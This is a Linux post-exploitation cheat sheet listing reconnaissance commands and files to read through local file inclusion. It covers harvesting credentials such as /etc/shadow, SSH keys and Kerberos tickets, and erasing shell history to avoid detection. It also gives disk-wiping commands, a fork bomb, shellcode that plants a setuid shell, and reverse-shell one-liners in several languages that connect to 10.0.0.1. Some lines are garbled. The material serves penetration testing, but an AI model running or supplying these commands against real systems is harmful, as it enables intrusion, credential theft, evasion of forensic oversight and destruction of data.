things to pull when all you can do is blindly read like in LFI/dir traversal (Don’t forget %00!)
| File | Contents and Reason |
|---|---|
| /etc/resolv.conf | Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd |
| /etc/motd | Message of the Day |
| /etc/issue | current version of distro |
| /etc/passwd | List of local users |
| /etc/shadow | List of users’ passwords’ hashes (requires root) |
| /home/xxx/.bash_history | Will give you some directory context |
| Command | Description and/or Reason |
|---|---|
| uname -a | Prints the kernel version, arch, sometimes distro |
| ps aux | List all running processes |
| top -n 1 -d | Print process, 1 is a number of lines |
| id | Your current username, groups |
| arch, uname -m | Kernel processor architecture |
| w | who is connected, uptime and load avg |
| who -a | uptime, runlevel, tty, proceses etc. |
| gcc -v | Returns the version of GCC. |
| mysql --version | Returns the version of MySQL. |
| perl -v | Returns the version of Perl. |
| ruby -v | Returns the version of Ruby. |
| python --version | Returns the version of Python. |
| df -k | mounted fs, size, % use, dev and mount point |
| mount | mounted fs |
| last -a | Last users logged on |
| lastcomm | |
| lastlog | |
| lastlogin (BSD) | |
| getenforce | Get the status of SELinux (Enforcing, Permissive or Disabled) |
| dmesg | Informations from the last system boot |
| lspci | prints all PCI buses and devices |
| lsusb | prints all USB buses and devices |
| lscpu | prints CPU information |
| lshw | list hardware information |
| ex | |
| cat /proc/cpuinfo | |
| cat /proc/meminfo | |
| du -h --max-depth=1 / | note: can cause heavy disk i/o |
| which nmap | locate a command (ie nmap or nc) |
| locate bin/nmap | |
| locate bin/nc | |
| jps -l | |
| java -version | Returns the version of Java. |
| Command | Description and/or Reason |
|---|---|
| hostname -f | |
| ip addr show | |
| ip ro show | |
| ifconfig -a | |
| route -n | |
| cat /etc/network/interfaces | |
| iptables -L -n -v | |
| iptables -t nat -L -n -v | |
| ip6tables -L -n -v | |
| iptables-save | |
| netstat -anop | |
| netstat -r | |
| netstat -nltupw | root with raw sockets |
| arp -a | |
| lsof -nPi | |
| cat /proc/net/* | more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff |
| Command | Description and/or Reason |
|---|---|
| cat /etc/passwd | local accounts |
| cat /etc/shadow | password hashes on Linux |
| /etc/security/passwd | password hashes on AIX |
| cat /etc/group | groups (or /etc/gshadow) |
| getent passwd | should dump all local, LDAP, NIS, whatever the system is using |
| getent group | same for groups |
| pdbedit -L -w | Samba’s own database |
| pdbedit -L -v | |
| cat /etc/aliases | mail aliases |
| find /etc -name aliases | |
| getent aliases | |
| ypcat passwd | displays NIS password file |
- ls -alh /home/*/
- ls -alh /home/*/.ssh/
- cat /home/*/.ssh/authorized_keys
- cat /home/*/.ssh/known_hosts
- cat /home/*/.hist # you can learn a lot from this
- find /home//.vnc /home//.subversion -type f
- grep ^ssh /home/*/.hist
- grep ^telnet `/home/*/.hist
- grep ^mysql /home/*/.hist
- cat /home/*/.viminfo
- sudo -l # if sudoers is not. readable, this sometimes works per user
- crontab -l
- cat /home/*/.mysql_history
- sudo -p (allows the user to define what the password prompt will be, useful for fun customization with aliases or shell scripts)
| File/Folder | Description and/or Reason |
|---|---|
| /home//.ssh/id | SSH keys, often passwordless |
| /tmp/krb5cc_* | Kerberos tickets |
| /tmp/krb5.keytab | Kerberos tickets |
| /home/*/.gnupg/secring.gpgs | PGP keys |
- ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte
- cat /etc/issue{,.net}
- cat /etc/master.passwd
- cat /etc/group
- cat /etc/hosts
- cat /etc/crontab
- cat /etc/sysctl.conf
- for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
- cat /etc/resolv.conf
- cat /etc/syslog.conf
- cat /etc/chttp.conf
- cat /etc/lighttpd.conf
- cat /etc/cups/cupsd.confcda
- cat /etc/inetd.conf
- cat /opt/lampp/etc/httpd.conf
- cat /etc/samba/smb.conf
- cat /etc/openldap/ldap.conf
- cat /etc/ldap/ldap.conf
- cat /etc/exports
- cat /etc/auto.master
- cat /etc/auto_master
- cat /etc/fstab
- find /etc/sysconfig/ -type f -exec cat {} ;
| File | Description and/or Reason |
|---|---|
| uname -a | often hints at it pretty well |
| lsb_release -d | Generic command for all LSB distros |
| /etc/os-release | Generic for distros using “systemd” |
| /etc/issue | Generic but often modified |
| cat /etc/*release | |
| /etc/SUSE-release | Novell SUSE |
| /etc/redhat-release, /etc/redhat_version | Red Hat |
| /etc/fedora-release | Fedora |
| /etc/slackware-release, /etc/slackware-version | Slackware |
| /etc/debian_release, /etc/debian_version | Debian |
| /etc/mandrake-release | Mandrake |
| /etc/sun-release | Sun JDS |
| /etc/release | Solaris/Sparc |
| /etc/gentoo-release | Gentoo |
| /etc/arch-release | Arch Linux (file will be empty) |
| arch | OpenBSD; sample: “OpenBSD.amd64” |
- rpm -qa --last | head
- yum list | grep installed
- Debian
- dpkg -l
- dpkg -l | grep -i “linux-image”
- dpkg --get-selections
- {Free,Net}BSD: pkg_info
- Solaris: pkginfo
- Gentoo: cd /var/db/pkg/ && ls -d / # always works
- Arch Linux: pacman -Q
- cat /etc/apt/sources.list
- ls -l /etc/yum.repos.d/
- cat /etc/yum.conf
- ls -dlR */
- ls -alR | grep ^d
- find /var -type d
- ls -dl `find /var -type d`
- ls -dl `find /var -type d` | grep -v root
- find /var ! -user root -type d -ls
- find /var/log -type f -exec ls -la {} ;
- find / -perm -4000 (find all suid files)
- ls -alhtr /mnt
- ls -alhtr /media
- ls -alhtr /tmp
- ls -alhtr /home
- cd /home/; treels /home//.ssh/
- find /home -type f -iname '.*history'
- ls -lart /etc/rc.d/
- locate tar | grep [.]tar$ # Remember to updatedb before running locate
- locate tgz | grep [.]tgz$
- locate sql | grep [.]sql$
- locate settings | grep [.]php$
- locate config.inc | grep [.]php$
- ls /home//id
- .properties | grep [.]properties # java config files
- locate .xml | grep [.]xml # java/.net config files
- find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm /6000 -ls # find suids
- locate rhosts
Also, check https://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
- export HISTFILE=
or - unset HISTFILE
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.
However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
clear all history in ram
- history -c
- rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
- touch ~/.bash_history (invasive)
- history -c (using a space before a command)
- zsh% unset HISTFILE HISTSIZE
- tcsh% set history=0
- bash$ set +o history
- ksh$ unset HISTFILE
- find / -type f -exec {} (forensics nightmare)
Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
If it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
Oh, and you’re probably a jerk if you use any of the stuff below.
| File | Description and/or Reason |
|---|---|
| rm -rf / | This will recursively try to delete all files |
| mkfs.ext3 /dev/sda | Reformat the device mentioned, making recovery of files hard |
| dd if=/dev/zero of=/dev/sda bs=1M | Overwrite disk /dev/sda with zeros |
- Hex version of rm -rf / (How is this supposed to work?)
char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
“\x6e\x2f\x73\x68\x00\x2d\x63\x00"
“cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;
- Fork Bomb: The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
:(){:|:&};:
- ls -alh /root/
- sudo -l
- cat /etc/sudoers
- cat /etc/shadow
- cat /etc/master.passwd # OpenBSD
- cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
- lsof -nPi
- ls /home//.ssh/
Starting list sourced from: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).
-
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
-
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
-
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
-
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
-
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
-
xterm -display 10.0.0.1:1se
-
Listener- Xnest :1
-
Add permission to connect- xhost +victimIP
-
ssh -NR 3333:localhost:22 user@yourhost
-
nc -e /bin/sh 10.0.0.1 1234
-
rsync -Rr dizin/ dizin/yedek
-
nmap --interactive
-
!sh
-
Source : https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List